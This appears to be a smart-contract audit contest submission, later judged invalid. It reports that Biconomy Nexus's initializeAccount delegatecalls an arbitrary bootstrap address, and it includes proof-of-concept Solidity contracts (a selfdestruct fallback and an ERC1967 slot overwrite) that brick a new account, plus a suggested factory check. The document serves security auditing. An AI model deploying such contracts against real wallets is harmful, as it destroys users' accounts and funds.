HardhatFoundry
30,000 USDC
Submission Details
Severity: low
Invalid

The Nexus account storage could be changed maliciously because of delegatecall and arbitrary bootstrap address in `initializeAccount`

Summary

The Nexus account storage could be changed maliciously because of delegatecall and arbitrary bootstrap address in initializeAccount

Vulnerability Details

```solidity
function initializeAccount(bytes calldata initData) external payable virtual {
    _initModuleManager();
    (address bootstrap, bytes memory bootstrapCall) = abi.decode(initData, (address, bytes));
    (bool success, ) = bootstrap.delegatecall(bootstrapCall); // @audit-issue bootstrap address can be arbitrary address
    require(success, NexusInitializationFailed());
}
```

The `initializeAccount` function in Nexus.sol does not validate the bootstrap address, so it can be any address.
The factory contracts, including NexusAccountFactory.sol and RegistryFactory.sol, also do not check whether `initData` carries a valid bootstrap address.
An attacker can therefore deploy a useless Nexus account as follows:

1. Deploy a contract with the code below. Assume its address is 0x123.

```solidity
contract Destructor {
    // Self-destructs on any call
    fallback() external {
        selfdestruct(payable(0));
    }
}
```

2. Deploy a fake bootstrap contract with the code below.

```solidity
contract LogicUpgrader {
    // ERC1967 implementation slot
    bytes32 private constant IMPLEMENTATION_SLOT = 0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc;

    // Runs via delegatecall from the Nexus account, so the writes land in the account's storage
    function upgradeTo(address newImplementation) external {
        assembly {
            // Store the new implementation address
            sstore(IMPLEMENTATION_SLOT, newImplementation)
            sstore(address(), newImplementation)
        }
    }

    // Builds the initData that initializeAccount decodes as (address, bytes)
    function getInitData() external view returns (bytes memory init) {
        init = abi.encode(address(this), abi.encodeCall(this.upgradeTo, (address(0x123)))); // 0x123 is deployed in step 1
    }
}
```

3. Deploy a Nexus account by calling `createAccount` in NexusAccountFactory.sol, with `initData` set to the data returned by `getInitData` of the step 2 contract. `salt` can be any value.

4. The result is a useless Nexus account, because its implementation is 0x123.

There are also other ways to break the newly deployed Nexus account, for example changing other storage of the Nexus account through the delegatecall to the arbitrary bootstrap address in `initializeAccount`.

Impact

Deploying with malicious `initData` yields a useless Nexus account.

Tools Used

Manual review

Recommendations

Validate the bootstrap address in NexusAccountFactory.sol and RegistryFactory.sol; consider the approach taken in K1ValidatorFactory.sol.
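One way a factory could enforce the recommendation above, shown here as an added illustration and not as code from the Biconomy Nexus repository: decode `initData` with the same `(address, bytes)` layout that `initializeAccount` uses and refuse to deploy unless the bootstrap address is the one the factory trusts. The contract and interface names, the `BOOTSTRAPPER` immutable, the custom errors and the minimal-proxy `_deployProxy` helper are all assumptions for this sketch.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

/// @notice Illustrative factory guard (assumed design, not the project's own code).
interface INexusLike {
    function initializeAccount(bytes calldata initData) external payable;
}

contract GuardedNexusFactory {
    /// @dev The single bootstrap contract this factory accepts (assumed).
    address public immutable BOOTSTRAPPER;
    /// @dev Account implementation every deployed proxy delegates to (assumed).
    address public immutable ACCOUNT_IMPLEMENTATION;

    error UntrustedBootstrap(address given);
    error AccountDeploymentFailed();

    constructor(address implementation, address bootstrapper) {
        ACCOUNT_IMPLEMENTATION = implementation;
        BOOTSTRAPPER = bootstrapper;
    }

    /// @notice Checks the bootstrap address inside `initData` before any
    ///         account is created, so a caller cannot route the account's
    ///         initialisation delegatecall to an arbitrary contract.
    function createAccount(bytes calldata initData, bytes32 salt)
        external
        payable
        returns (address account)
    {
        // Same layout that initializeAccount decodes: (address bootstrap, bytes call)
        (address bootstrap, ) = abi.decode(initData, (address, bytes));
        if (bootstrap != BOOTSTRAPPER) revert UntrustedBootstrap(bootstrap);

        account = _deployProxy(salt);
        INexusLike(account).initializeAccount{value: msg.value}(initData);
    }

    /// @dev Minimal ERC-1167 clone via CREATE2; a stand-in for whatever proxy
    ///      the real factory deploys (assumption for the example).
    function _deployProxy(bytes32 salt) internal returns (address proxy) {
        address impl = ACCOUNT_IMPLEMENTATION;
        assembly {
            let ptr := mload(0x40)
            mstore(ptr, 0x3d602d80600a3d3981f3363d3d373d3d3d363d73000000000000000000000000)
            mstore(add(ptr, 0x14), shl(0x60, impl))
            mstore(add(ptr, 0x28), 0x5af43d82803e903d91602b57fd5bf30000000000000000000000000000000000)
            proxy := create2(0, ptr, 0x37, salt)
        }
        if (proxy == address(0)) revert AccountDeploymentFailed();
    }
}
```

The check is deliberately placed in the factory rather than in `initializeAccount`, matching the recommendation: the account contract keeps accepting an arbitrary bootstrap for flexibility, while the public deployment path only lets the trusted bootstrap through.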

Updates

Lead Judging Commences

0xnevi Lead Judge 10 months ago
Submission Judgement Published
Invalidated
Reason: Other
Assigned finding tags:

finding-front-running-initializeAccount

Invalid, - Checked [here](https://github.com/rhinestonewtf/sentinellist/blob/6dff696f39fb55bfdde9581544d788932f145e47/src/SentinelList.sol#L30-L32) based on `SentinelListLib` used as dependencies as seen [here](https://github.com/Cyfrin/2024-07-biconomy/blob/9590f25cd63f7ad2c54feb618036984774f3879d/contracts/interfaces/base/IStorage.sol#L34-L35). Contract cannot be reinitialized - front-running initializers invalid per [codehawks guidelines](https://docs.codehawks.com/hawks-auditors/how-to-determine-a-finding-validity#findings-that-may-be-invalid)
